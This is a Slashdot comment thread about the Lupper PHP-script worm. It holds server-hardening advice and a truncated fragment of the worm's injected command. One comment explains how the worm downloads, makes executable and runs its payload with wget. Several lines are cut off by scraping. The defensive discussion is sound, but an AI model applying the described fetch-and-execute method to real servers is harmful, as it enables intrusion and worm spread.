Linux Lupper.Worm In the WIld 363
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
PHP exploit, not directly a linux problem? (Score:5, Insightful)
How can we get some free press? (Score:3, Insightful)
if it attacks PHP cross-platform... (Score:5, Insightful)
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
Sadly a preview of things to come because... (Score:5, Insightful)
Success is a double-edged sword.
Conditions for infection... (Score:5, Insightful)
Re:How can we get some free press? (Score:5, Insightful)
Re:Remarkably Useless page. (Score:5, Insightful)
More alarmist shit (and old news at tht - The Reg reported this last week).
Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.
The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.
Re:How can we get some free press? (Score:5, Insightful)
Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.
Re:So let me get this straight (Score:3, Insightful)
In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.
Re:PHP exploit, not directly a linux problem? (Score:3, Insightful)
The security holes are most likely generic.
Re:CONTINUE: (Score:4, Insightful)
Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
Re:Before all teh MSFT fanboys jump on this, (Score:2, Insightful)
Re:CONTINUE: (Score:1, Insightful)
Re:How can we get some free press? (Score:2, Insightful)
Re:Linux/BSD only (Score:5, Insightful)
No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.
Preventative measures (Score:4, Insightful)
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Re:Remarkably Useless page. (Score:5, Insightful)
The key word is "attempts".
Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?
The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.
Now:
In other words, nothing to see here but more antivirus vendor fud.
Only partially. (Score:4, Insightful)
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Popularity != Security (Score:3, Insightful)
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
Re:Conditions for infection... (Score:3, Insightful)
for all of the navigation. Apparently he had been using forms for navigation and had each button holding the value of the file he wanted, and a hidden field holding the full URL to the section of the site. So the code ended up looking like
On top of all this they were storing sensitive customer information in plaintext files. I STRONGLY recommended that my boss send out letters to all their customers informing them of the vunrability so that they could take steps to ensure that they got their credit card numbers, etc. changed.
I think that the big problem is businesses that higher highschool students who have no idea of how to write good code doing websites for 6 bucks an hour. When the finally decided to higher someone who had some idea of how to do decent code (I don't claim to be an expert in PHP, but I certainly have more experience with it than a 16 year old, and I do at least try to keep security in mind when I write code). I ended up leaving after I'd fixed the security vulrnabilities (since I didn't see it as being ethical to just leave a business running where it was so that customers could unknowingly have their info stolen) because my boss was constantly on my ass (He didn't understand why I needed to spend time designing a database when flat text files has worked on their site for so long, for example) and basically told me to take shortcuts to get the code done ASAP.
In the end I think that this is is one of the biggest problems with software vulrnabilities. People are more concerned with getting it done than getting it done correctly. I think that one of the advantages that F/OSS has is that, while some coders will still perhaps be more concerned with time than correctness, there is less of management glaring over your shoulder and telling you to take shortcuts to meet deadlines.
You're wrong. (Score:5, Insightful)
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home. That's what you believe. Yet my bank example shows that popularity has nothing to do with security. That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
Re:CONTINUE: (Score:3, Insightful)
FTA I don't see where it a linux worm, or even an appache worm it's primarily attacking php scripts even then it's only capable of attacking php scripts in servers that are configured to allow 2 very well known security configuration flaws and one that's recomemded against. NOTE the windows ME-XP instructions on the page [nai.com].
Re:Remarkably Useless page. (Score:3, Insightful)
er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.
it was mis-classified as a "linux" worm, even though it has zero to do with linux. It's a bug in several php 3rd-party scripts, it was fixed months ago, and today is Troll Tuesday, and the editors are messing with your heads.
sure, if I want I could set a box up to partake in the fun (get an older distro, make sure it has the right files, and put it on the net ... and wait pretty much forever for it to get wormed. It's not that prevailent, it's not that capable of propagating itself (there aren't that many vulnerable hosts out there), yadda yadda yadda ...
Remember, symantec and Mcafee and the rest are looking at their market pretty much disappearing over the next 2 years. Microsoft is going to be selling their own anti-virus, and most people will go with that as a default, even if there are much better products out there.
It's the same situation with firefox and openoffice - both much better products than Internet Exploder and Word, but people stick with what they've got because they're lazy and/or stupid and/or timid and/or its "good enough".
So just who are the antivirus vendors going to sell to in the future? Its not like you need any special tools to clean up a unix box with a bad script - last I looked, vi and/or rm came with every system. As for bad binaries, well, unlike certain OTHER systems, we have the source ... we're not dependent on vendors for patching binaries, nor on antivirus vendors for "cleaning" infected binaries.
So, again, the antivirus vendors are looking at a diminishing market base over the next few years. Time for them to start hiring some black hats and creating as many worms as they can.
Re:Remarkably Useless page. (Score:3, Insightful)
So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.
on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scritpts with holes in them that have been exploited (and then had to hunt down and clean up the resulting exploitation). Some of the customers respond to our warning messages. Others ignore the warnings and just blindly re-enable the broken scripts.
These are definitely user issues, not Linux issues. If you install and run a program you really are responsible for making sure that it's safe. Beyond a certain point, the OS can't protect you from your own stupidity.
On the other hand, if the exploit then finds a local root exploit, then I'd call that a Linux problem.
As far as I'm concerned, the distributor is responsible for holes in a default installation -- Those are often done by newbies who may not even know that a vulnerable service is running on his/her box (or even what a service is).
When you start installing add-on programs and remote scripts, their default forms are pretty much the responsibility of the people who make them available (modulo any explicit warnings they give an installer). The user, however is ultimately responsible for what he adds to his system.
No. (Score:3, Insightful)
Security is independant of popularity.
There is nothing about popularity that makes a system more or less secure. No. No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security. Because their security is not perfect. Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != Risk Read "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
Can't measure OS security by worm prevalence. (Score:3, Insightful)
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quicly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
Re:Remarkably Useless page. (Score:5, Insightful)
Symptoms
Presence of the following file:
*
One of the following ports are listening:
* UDP 7111
* UDP 7222
so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm
the worm appearent does this
echo '_begin_';echo `cd
so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.
Re:Sadly a preview of things to come because... (Score:3, Insightful)
if for example type this into my browser and I see bingo in my browser example.com would probably be vulnerable, the worm presently uses a linux program wget (wget is a program that downloads files from a web server) to download the payload to the vulnerable machine, make it executeable with a chmod +x and runs it. When the worm runs, it searches for vulnerable machines on the network and and does the same things to them.
any RPC, Remote Procedure Protocol, has big impact on security, especaly commands that can change directories, download files, or make a file executable.
Re:Only partially. (Score:3, Insightful)
If you're the only user, you can rename the xmlrpc files.
Besides, your
Re:How can we get some free press? (Score:2, Insightful)
Linux fans degenerating down to semantics is really, really sad.